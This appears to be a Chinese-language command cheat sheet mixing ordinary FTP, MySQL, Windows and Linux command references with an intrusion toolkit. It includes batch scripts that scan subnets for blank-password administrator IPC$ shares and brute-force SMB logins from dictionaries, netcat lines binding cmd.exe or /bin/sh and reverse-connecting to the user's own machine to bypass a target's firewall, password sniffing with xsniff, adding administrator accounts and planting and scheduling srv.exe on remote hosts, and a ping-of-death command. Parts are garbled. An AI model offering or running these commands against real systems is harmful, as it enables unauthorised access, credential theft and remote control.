help [命令] 或？[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

mget [remote-files] 从远端主机接收一批文件至本地主机

mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值)

bin 或 image 设定以二进制方式传送文件

bell 每完成一次文件传送,报警提示

cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录

rename [from] [to] 改变远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的状态

system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机

open host [port] 重新建立一个新的连接

prompt 交互提示模式

macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

cd remote－dir 进入远程主机目录

! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

MYSQL 命令：

mysql -h主机地址 -u用户名－p密码连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。

（例：mysql -h110.110.110.110 -Uroot -P123456

注:u与root可以不用加空格，其它也一样）

exit 退出MYSQL

mysqladmin -u用户名 -p旧密码 password 新密码修改密码

use mysql；

show tables; 显示库中的数据表

describe 表名; 显示数据表的结构

create database 库名; 建库

use 库名；

create table 表名 (字段设定列表)；建表

drop database 库名;

drop table 表名；删库和删表

delete from 表名; 将表中记录清空

select * from 表名; 显示表中的记录

win2003系统下新增命令（实用部份）：

shutdown /参数关闭或重启本地或远程主机。

参数说明：/S 关闭主机，/R 重启主机， /T 数字设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。

例：shutdown /r /t 0 立即重启本地主机（无延时）

taskill /参数进程名或进程的pid 终止一个或多个任务和进程。

tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。

参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。

Linux系统下基本命令：要区分大小写

uname 显示版本信息（同win2K的 ver）

dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）

pwd 查询当前所在的目录位置

cd cd ..回到上一层目录，注意cd 与..之间有空格。cd /返回到根目录。

cat 文件名查看文件内容

cat abc.txt 往abc.txt文件中写上内容。

more 文件名以一页一页的方式显示一个文本文件。

cp 复制文件

mv 移动文件

rm 文件名删除文件，rm -a 目录名删除目录及子目录

chmod 设定档案或目录的存取权限

grep 在档案中查找字符串

diff 档案文件比较

find 档案搜寻

date 现在的日期、时间

who 查询目前和你使用同一台机器的人以及Login时间地点

w 查询目前上机者的详细资料

whoami 查看自己的帐号名称

groups 查看某人的Group

passwd 更改密码

history 查看自己下过的命令

ps 显示进程状态

kill 停止某进程

gcc 黑客通常用它来编译C语言写的文件

su 权限转换为指定使用者

telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。

ftp ftp连接上某服务器（同win2K）

附：批处理命令与变量

1：for命令及变量基本格式：

批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：来隔开

command_parameters：为特定命令指定参数或命令行开关

IN (set)：指在(set)中取值；DO command ：指执行command

参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。

用法举例：

@echo off

echo 用法格式：test.bat *.*.* test.txt

for /L %%G in (1 1 254) do echo %1.%%G test.txt net use \\%1.%%G /user:administrator | find "命令成功完成" test.txt

存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。

@echo off

echo 用法格式：ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。

2：if命令及变量基本格式：

IF [not] errorlevel 数字命令语句如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。

例：IF errorlevel 0 命令指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。

0 指发现并成功执行（真）；1 指没有发现、没执行（假）。

IF [not] 字符串1==字符串2 命令语句如果指定的文本字符串匹配（即：字符串1 等于字符串2），就执行后面的命令。

例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）

IF [not] exist 文件名命令语句如果指定的文件名存在，就执行后面的命令。

例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。

（二）系统外部命令(均需下载相关工具)：

1、瑞士军刀：nc.exe

参数说明：

-h 查看帮助信息

-d 后台模式

-e prog程序重定向，一但连接就执行〔危险〕

-i secs延时的间隔

-l 监听模式，用于入站连接

-L 监听模式，连接天闭后仍然继续监听，直到CTR+C

-n IP地址，不能用域名

-o film记录16进制的传输

-p[空格]端口本地端口号

-r 随机本地及远程端口

-t 使用Telnet交互方式

-u UDP模式

-v 详细输出，用-vv将更详细

-w数字 timeout延时间隔

-z 将输入，输出关掉（用于扫锚时）

基本用法：

nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

nc -l -p 80 开启本机的TCP 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口

高级用法：

nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止

nc -L -p 80 c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用

type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用：nc -l -p 本机端口

在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

本机上用：nc -d -l -p 本机端口要传送的文件路径及名称

在对方主机上用：nc -vv 本机IP 本机端口存放文件的路径及名称传送文件到对方主机

备注：

| 管道命令

或重定向命令。“”，例如：tlntadmn test.txt 指把test.txt的内容赋值给tlntadmn命令

＠表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中

与的区别 ""指：覆盖；""指：保存到(添加到）。

2、扫锚工具：xscan.exe

基本格式

xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息

xscan -file 主机列表文件名检测项目 [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息

检测项目

-active 检测主机是否存活

-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检测以上所有项目

其它选项

-i 适配器编号设置网络适配器, 适配器编号可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

-o 跳过没有检测到开放端口的主机

-t 并发线程数量,并发主机数量指定最大并发线程数量和并发主机数量, 默认数量为100,10

-log 文件名指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机

3、命令行方式嗅探器: xsniff.exe

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数说明

-tcp 输出TCP数据报

-udp 输出UDP数据报

-icmp 输出ICMP数据报

-pass 过滤密码信息

-hide 后台运行

-host 解析主机名

-addr IP地址过滤IP地址

-port 端口过滤端口

-log 文件名将输出保存到文件

-asc 以ASCII形式输出

-hex 以16进制形式输出

用法示例

xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中

xsniff.exe -tcp -u

cmd中全部命令`````

winver 检查Windows版本

wmimgmt.msc 打开Windows管理体系结构(wmi)

wupdmgr Windows更新程序

wscript Windows脚本宿主设置

write 写字板

winmsd 系统信息

wiaacmgr 扫描仪和照相机向导

winchat xp自带局域网聊天

mem.exe 显示内存使用情况

msconfig.exe 系统配置实用程序

mplayer2 简易widnows media player

mspaint 画图板

mstsc 远程桌面连接

mplayer2 媒体播放机

magnify 放大镜实用程序

mmc 打开控制台

mobsync 同步命令

dxdiag 检查directx信息

drwtsn32 系统医生

devmgmt.msc 设备管理器

dfrg.msc 磁盘碎片整理程序

diskmgmt.msc 磁盘管理实用程序

dcomcnfg 打开系统组件服务

ddeshare 打开dde共享设置

dvdplay dvd播放器

net stop messenger 停止信使服务

net start messenger 开始信使服务

notepad 打开记事本

nslookup 网络管理的工具向导

ntbackup 系统备份和还原

narrator 屏幕“讲述人”

ntmsmgr.msc 移动存储管理器

ntmsoprq.msc 移动存储管理员操作请求

netstat -an （tc）命令检查接口

syncapp 创建一个公文包

sysedit 系统配置编辑器

sigverif 文件签名验证程序

sndrec32 录音机

shrpubw 创建共享文件夹

secpol.msc 本地安全策略

syskey 系统加密，一旦加密就不能解开，保护Windows xp系统的双重密码

services.msc 本地服务设置

sndvol32 音量控制程序

sfc.exe 系统文件检查器

sfc /scannow windows文件保护 tsshutdn 60秒倒计时关机命令

tourstart xp简介（安装完成后出现的漫游xp程序）

taskmgr 任务管理器

eventvwr 事件查看器

eudcedit 造字程序

explorer 打开资源管理器

packager 对象包装程序

perfmon.msc 计算机性能监测程序

progman 程序管理器

regedit.exe 注册表

rsop.msc 组策略结果集

regedt32 注册表编辑器

rononce -p 15秒关机

regsvr32 /u *.dll 停止dll文件运行

regsvr32 /u zipfldr.dll 取消zip支持

cmd.exe cmd命令提示符

chkdsk.exe chkdsk磁盘检查

certmgr.msc 证书管理实用程序

calc 启动计算器

charmap 启动字符映射表

cliconfg sql server 客户端网络实用程序

clipbrd 剪贴板查看器

conf 启动netmeeting

compmgmt.msc 计算机管理

cleanmgr 垃圾整理

ciadv.msc 索引服务程序

osk 打开屏幕键盘

odbcad32 odbc数据源管理器

oobe/msoobe /a 检查xp是否激活

lusrmgr.msc 本机用户和组

logoff 注销命令

iexpress 木马捆绑工具，系统自带

nslookup ip地址侦测器

fsmgmt.msc 共享文件夹管理器

utilman 辅助工具管理器

gpedit.msc 组策略

以下为Windows操作系统的常用运行命令,执行这些命令,就能打开系统对应的相关实用程序,如果大家能基本利用,就能检查并修复系统的最基本的故障,除注销,关闭系统命令外,其它所有命令,大家不妨一试!!

运行\输入CMD\输入对应的相关实用程序:

. 打开C:＼Documents and Settings＼XXX(当前登录Windows XP的用户名)

.. 打开Windows XP所在的盘符下的Documents and Settings文件夹

... 打开“我的电脑”选项。

accwiz.exe 辅助工具向导

actmovie.exe 直接显示安装工具

append.exe 允许程序打开制定目录中的数据

arp.exe 显示和更改计算机的IP与硬件物理地址的对应列表

at.exe 计划运行任务

atmadm.exe ATM调用管理器统计

attrib.exe 显示和更改文件和文件夹属性

autochk.exe 检测修复文件系统 (XP不可用)

autoconv.exe 在启动过程中自动转化系统 (XP不可用)

autofmt.exe 在启动过程中格式化进程 (XP不可用)

autolfn.exe 使用长文件名格式 (XP不可用)

arp.exe 显示和更改计算机的IP与硬件物理地址的对应

calc.exe 计算器

Bootvrfy.exe 通报启动成功

cacls.exe 显示和编辑ACL

cdplayer.exe CD播放器

change.exe 与终端服务器相关的查询 (XP不可用)

charmap.exe 字符映射表

chglogon.exe 启动或停用会话记录 (XP不可用)

chgport.exe 改变端口（终端服务） (XP不可用)

chgusr.exe 改变用户（终端服务） (XP不可用)

chkdsk.exe 磁盘检测程序

chkntfs.exe NTFS磁盘检测程序

cidaemon.exe 组成Ci文档服务

cipher.exe 在NTFS上显示或改变加密的文件或目录

cisvc.exe 打开索引内容

ckcnv.exe 变换Cookie

cleanmgr.exe 磁盘清理

cliconfg.exe SQL客户网络工具

clipbrd.exe 剪贴簿查看器

clipsrv.exe 运行Clipboard服务

clspack.exe 建立系统文件列表清单

cluster.exe 显示域的集群 (XP不可用)

cmd.exe 进2000\XP DOS

cmdl32.exe 自动下载连接管理

cmmgr32.exe 连接管理器

cmmon32.exe 连接管理器监视

cmstp.exe 连接管理器配置文件安装程序

comclust.exe 集群

comp.exe 比较两个文件和文件集的内容

conf 启动netmeeting聊天工具

control userpasswords2 XP密码管理.

compmgmt.msc 计算机管理

cprofile.exe 转换显示模式 (XP不可用)

开始,运行,输入CMD\输入net config workstation计算机名 \完整的计算机名\用户名

工作站处于活动状态（即网络描述） \软件版本（即软件版本号） \工作站域工作站域的 DNS 名称

登录域 \COM 打开时间超时（秒） \COM 发送量（字节） \COM 发送超时 (msec)

CMD\输入net config workstation 更改可配置工作站服务设置。

CMD\输入net config server 可以显示不能配置的下服务器计算机名 \服务器注释 \服务器版本（即软件版本号）

服务器处于活动状态（即网络描述） \服务器处于隐藏状态（即 /hidden 设置）

最大登录用户数（即可使用服务器共享资源的最大用户数）

每个会话打开文件的最大数（即用户可在一个会话中打开服务器文件的最大数）

空闲会话时间（最小值）

chkdsk.exe 磁盘检查.

Chkdsk /r 2000命令控制台中的Chkdsk /r命令检查修复系统文件

cleanmgr 垃圾整理

Clipbrd 剪贴板查看器

C:boot.ini 打开启动菜单

compact.exe 显示或改变NTFS分区上文件的压缩状态

conime.exe IME控制台

control.exe 控制面板

convert.exe NTFS 转换文件系统到NTFS

convlog.exe 转换IIS日志文件格式到NCSA格式

cprofile.exe 转换显示模式

cscript.exe 较本宿主版本

csrss.exe 客户服务器Runtime进程 (XP不可用)

csvde.exe 格式转换程序 (XP不可用)

dcpromo 活动目录安装(XP不可用)

drwtsn32 系统医生

diskmgmt.msc 磁盘管理器(和PowerQuest PartitionMagic 8.0)

dvdplay DVD 播放器

devmgmt.msc 设备管理器(检查电脑硬件,驱动)

dxdiag 检查DirectX信息

dcomcnfg.exe DCOM配置属性 (控制台根目录)

dcpromo.exe 安装向导 (XP不可用)

ddeshare.exe DDE共享

debug.exe 检查DEBUG

dfrgfat.exe FAT分区磁盘碎片整理程序

dfrgntfs.exe NTFS分区磁盘碎片整理程序 (XP不可用)

dfs_cmd_.exe 配置DFS树 (XP不可用)

dfsinit.exe 分布式文件系统初始化(XP不可用)

dfssvc.exe 分布式文件系统服务器 (XP不可用)

diantz.exe 制作CAB文件

diskperf.exe 磁盘性能计数器

dmremote.exe 磁盘管理服务的一部分 (XP不可用)

doskey.exe 命令行创建宏

dosx.exe DOS扩展

dplaysvr.exe 直接运行帮助 (XP不可用)

drwatson.exe 华生医生错误检测

drwtsn32.exe 华生医生显示和配置管理

dvdplay.exe DVD播放

dxdiag.exe Direct-X诊断工具

edlin.exe 命令行的文本编辑

esentutl.exe MS数据库工具

eudcedit.exe 造字程序

eventvwr.exe 事件查看器

exe2bin.exe 转换EXE文件到二进制

expand.exe 解压缩

extrac32.exe 解CAB工具

fsmgmt.msc 共享文件夹

fastopen.exe 快速访问在内存中的硬盘文件

faxcover.exe 传真封面编辑

faxqueue.exe 显示传真队列

faxsend.exe 发送传真向导

faxsvc.exe 启动传真服务

fc.exe 比较两个文件的不同

find.exe 查找文件中的文本行

findstr.exe 查找文件中的行

finger.exe 一个用户并显示出统计结果

fixmapi.exe 修复MAPI文件

flattemp.exe 允许或者禁用临时文件目录 (XP不可用)

fontview.exe 显示字体文件中的字体

forcedos.exe 强制文件在DOS模式下运行

FTP下载

gpedit.msc 组策略

gdi.exe 图形界面驱动

grpconv.exe 转换程序管理员组

hostname.exe 显示机器的Hostname

Internat 输入法图标

iexpress 木马捆绑工具，系统自带

ieshwiz.exe 自定义文件夹向导

iexpress.exe iexpress安装包

iisreset.exe 重启IIS服务(未安装IIS,不可用)

internat.exe 键盘语言指示器 (XP不可用)

ipconfig.exe 查看IP配置

ipsecmon.exe IP安全监视器

ipxroute.exe IPX路由和源路由控制程序

ir 无线连接

ismserv.exe 安装或者删除Service Control Manager中的服务

jdbgmgr.exe Java4的调试器

jetconv.exe 转换Jet Engine数据库 (XP不可用)

jetpack.exe 压缩Jet数据库 (XP不可用)

jview.exe Java的命令行装载者

label.exe 改变驱动器的卷标

lcwiz.exe 许可证向导 (XP不可用)

ldifde.exe LDIF目录交换命令行管理 (XP不可用)

licmgr.exe 终端服务许可协议管理 (XP不可用)

lights.exe 显示连接状况 (XP不可用)

llsmgr.exe Windows 2000 许可协议管理 (XP不可用)

llssrv.exe 启动许可协议服务器 (XP不可用)

locator.exe RPC Locator 远程定位

lodctr.exe 调用性能计数

logoff.exe 注销当前用户

lpq.exe 显示远端的LPD打印队列的状态，显示被送到基于Unix的服务器的打印任务

lpr.exe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。

lsass.exe 运行LSA和Server的DLL

lserver.exe 指定默认Server新的DNS域 (XP不可用)

lusrmgr.msc 本地账户管理

mmc 控制台

mplayer2 播放器

macfile.exe 管理MACFILES (XP不可用)

magnify.exe 放大镜

makecab.exe 制作CAB文件

mem.exe 显示内存状态

migpwd.exe 迁移密码

mmc.exe 控制台

mnmsrvc.exe 远程桌面共享

mobsync.exe 同步目录管理器

mountvol.exe 创建、删除或列出卷的装入点。

mplay32.exe Media Player 媒体播放器

mpnotify.exe 通知应用程序

mqbkup.exe 信息队列备份和恢复工具

mqmig.exe MSMQ Migration Utility 信息队列迁移工具

mrinfo.exe 使用SNMP多点传送路由

mscdexnt.exe 安装MSCD

msdtc.exe 动态事务处理控制台

msg.exe 发送消息到本地或远程客户

mshta.exe HTML应用程序主机

msiexec.exe 开始Windows安装程序

mspaint.exe 打开画图板

mstask.exe 任务计划表程序

mstinit.exe 任务计划表安装

Msconfig.exe 系统配置实用程序 (配置启动选项,服务项)

mem.exe 显示内存使用情况

mspaint 画图板

Net Stop Messenger 停止信使服务

Net Start Messenger 恢复信使服务

nslookup 网络管理的工具

Nslookup IP 地址侦测器

ntbackup 系统备份和还原

nbtstat.exe 使用 NBT（TCP/IP 上的 NetBIOS）显示协议统计和当前 TCP/IP 连接。

nddeapir.exe NDDE API服务器端

netsh.exe 用于配置和监控 Windows 2000 命令行脚本接口(XP不可用)

netstat.exe 显示协议统计和当前的 TCP/IP 网络连接。

nlsfunc.exe 加载特定国家的信息。Windows 2000 和 MS-DOS 子系统不使用该命令接受该命令只是为了与 MS-DOS 文件兼容。

notepad.exe 打开记事本

nslookup.exe 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。

ntbackup.exe 备份和故障修复工具

ntfrs.exe NT文件复制服务 (XP不可用)

ntvdm.exe 模拟16位Windows环境

nw16.exe NetWare转向器

nwscript.exe 运行Netware脚本

odbcad32.exe 32位ODBC数据源管理 (驱动程序管理)

odbcconf.exe 命令行配置ODBC驱动和数据源

packager.exe 对象包装程序

pathping.exe 包含Ping和Tracert的程序

pentnt.exe 检查Pentium的浮点错误

perfmon.exe 系统性能监视器

ping.exe 验证与远程计算机的连接

posix.exe 用于兼容Unix

print.exe 打印文本文件或显示打印队列的内容。

progman.exe 程序管理器

psxss.exe Posix子系统应用程序

qappsrv.exe 在网络上显示终端服务器可用的程序

qprocess.exe 在本地或远程显示进程的信息（需终端服务）

query.exe 查询进程和对话 (XP不可用)

quser.exe 显示用户登陆的信息（需终端服务）

qwinsta.exe 显示终端服务的信息

rononce -p 15秒关机

rasAdmin 远程访问服务.

regedit.exe 注册表编辑器

rasadmin.exe 启动远程访问服务 (XP不可用)

rasautou.exe 建立一个RAS连接

rasdial.exe 宽带,拨号连接

ras.exe 运行RAS连接 (XP不可用)

rcp.exe 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件

rdpclip.exe 终端和本地复制和粘贴文件

recover.exe 从坏的或有缺陷的磁盘中恢复可读取的信息。

redir.exe 运行重定向服务

regedt32.exe 32位注册服务

regini.exe 用脚本修改注册许可

regwiz.exe 注册向导

replace.exe 用源目录中的同名文件替换目标目录中的文件。

rexec.exe rexec 命令在执行指定命令前，验证远程计算机上的用户名，只有安装了 TCP/IP 协议后才可以使用该命令。

risetup.exe 运行远程安装向导服务 (XP不可用)

route.exe 控制网络路由表

rsh.exe 在运行 RSH 服务的远程计算机上运行命令

rsnotify.exe 远程存储通知回显

runas.exe 允许用户用其他权限运行指定的工具和程序

rundll32.exe 启动32位DLL程序

rwinsta.exe 重置会话子系统硬件和软件到最初的值

Sndvol32 音量控制程序

sfc.exe 或CMD\ sfc.exe 回车系统文件检查器

services.msc 网络连接服务

syskey 系统加密，(一旦加密就不能解开，保护windows xp系统的双重密码wupdmgr WIDNOWS UPDATE)

SCANREG/RESTORE 命令恢复最近的注册表

secedit.exe 自动化安全性配置管理

services.exe 控制所有服务

sethc.exe 设置高对比

setver.exe 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号

sfc.exe 系统文件检查

shadow.exe 监控另外一台中端服务器会话

shrpubw.exe 建立和共享文件夹

sigverif.exe 文件签名验证

smlogsvc.exe 性能日志和警报 (XP不可用)

sndrec32.exe 录音机

sndvol32.exe 显示声音控制信息

snmp.exe 简单网络管理协议 (XP不可用)

snmptrap.exe SNMP工具 (XP不可用)

srvmgr.exe 服务器管理器 (XP不可用)

subst.exe 将路径与驱动器盘符关联

sysedit.exe 系统配置编辑器

syskey.exe NT账号数据库加密工具

sysocmgr.exe Windows 安装程序

systray.exe 在低权限运行systray

taskmgr 任务管理器

tasklist /svc(CMD)了解每个SVCHOST进程到底提供了多少系统服务(2000\98不可用)

tlist -S(CMD) 了解每个SVCHOST进程到底提供了多少系统服务(

taskman.exe 任务管理器 (XP不可用)

taskmgr.exe 任务管理器

tcmsetup.exe 电话服务客户安装

tcpsvcs.exe TCP服务

termsrv.exe 终端服务

t 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件

themes.exe 桌面主题 (XP不可用)

tlntadmn.exe Administrator Telnet服务管理

tlntsess.exe 显示目前的Telnet会话

tlntsvr.exe 开始Telnet服务

tracert.exe 诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标，以决定到达目标采用的路由

tsadmin.exe Administrator 终端服务管理器 (XP不可用)

tscon.exe 粘贴用户会话到终端对话

tsdiscon.exe 断开终端服务的用户

tskill.exe 杀掉终端服务

tsprof.exe 用终端服务得出查询结果

tsshutdn.exe 关闭系统

unlodctr.exe 性能监视器的一部分

upg351db.exe 升级Jet数据库 (XP不可用)

ups.exe UPS service UPS服务

user.exe Windows核心服务

userinit.exe 打开我的文档

usrmgr.exe 域用户管理器

utilman.exe 指定2000启动时自动打开那台机器

vwipxspx.exe 调用IPX/SPX VDM

w32tm.exe 时间服务器

wextract.exe 解压缩Windows文件

winchat.exe 打开Windows聊天工具

winhlp32.exe 运行帮助系统

winmsd.exe 查看系统信息

winver.exe 显示Windows版本

wizmgr.exe Windows管理向导 (XP不可用)

wjview.exe Java 命令行调用Java

write.exe 打开写字板

wscript.exe 脚本工具

wupdmgr.exe Windows update 运行Windows update升级向导

winver 检查Windows版本

Win98系统工具

开始,运行,输入Msconfig 系统配置实用工具配置启动选项，包括config.sys、autoexec.bat、win.ini、system.ini和注册表及程序菜单中的启动项。并可设置是否故障启动。

开始,运行,输入Regedit 注册表修改工具注册表编辑器，如果没有把握不要随意修改注册表！

开始,运行,输入Regsvr32 dll注册工具当提示找不到dll文件时，可用此来注册该动态连接库。

开始,运行,输入Regwiz 注册向导用于注册。校验系统文件，并可恢复系统文件。

如果启动时出现类似*.vxd文件错误，可用此恢复该vxd文件。

开始,运行,输入Scandskw 磁盘扫描程序,用于扫描修复磁盘。如果磁盘或文件出现错误，可用来初步修复。

开始,运行,输入DxDiag DirectX诊断工具可用于检测DirectX运行是否正常。

开始,运行,输入NETSCAPE

ESC：清除当前命令行；

F7：显示命令历史记录，以图形列表窗的形式给出所有曾经输入的命令，并可用上下箭头键选择再次执行该命令。

F8：搜索命令的历史记录，循环显示所有曾经输入的命令，直到按下回车键为止；

F9：按编号选择命令，以图形对话框方式要求您输入命令所对应的编号(从0开始)，并将该命令显示在屏幕上；

Ctrl+H：删除光标左边的一个字符；

Ctrl+C Ctrl+Break，强行中止命令执行；

Ctrl+M：表示回车确认键；

Alt+F7：清除所有曾经输入的命令历史记录；

Alt+PrintScreen：截取屏幕上当前命令窗里的内容。

病毒破坏了系统文件，请使用杀毒软件查杀病毒，然后利用Windows 2000提供的“命令控制台”中的Chkdsk /r命令检查修复系统文件即可

DOS命令字典..收藏

net use \ip\ipc$ " " /user:" " 建立IPC空链接

net use \ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \ip\c$ 登陆后映射对方C：到本地为H:

net use \ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名查看帐户的属性

net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：***istrator后加s用复数

net start 查看开启了哪些服务

net start 服务名开启服务；(如:net start telnet， net start schedule)

net stop 服务名停止某服务

net time \目标ip 查看对方时间

net time \目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc

net share ipc$ /del 删除ipc

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \ip\***$ 复制本地c:\srv.exe到对方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

copy \ip\***$\svv.exe c:\ 或:copy\ip\***$\*.* 复制对方***i.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树目标地址\目录名复制文件和目录树，用参数/Y将不提示覆盖相同文件

tftp -i 对方IP put c:\server.exe 登陆后，上传本地c:\server.exe至主机

ftp ip 端口用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

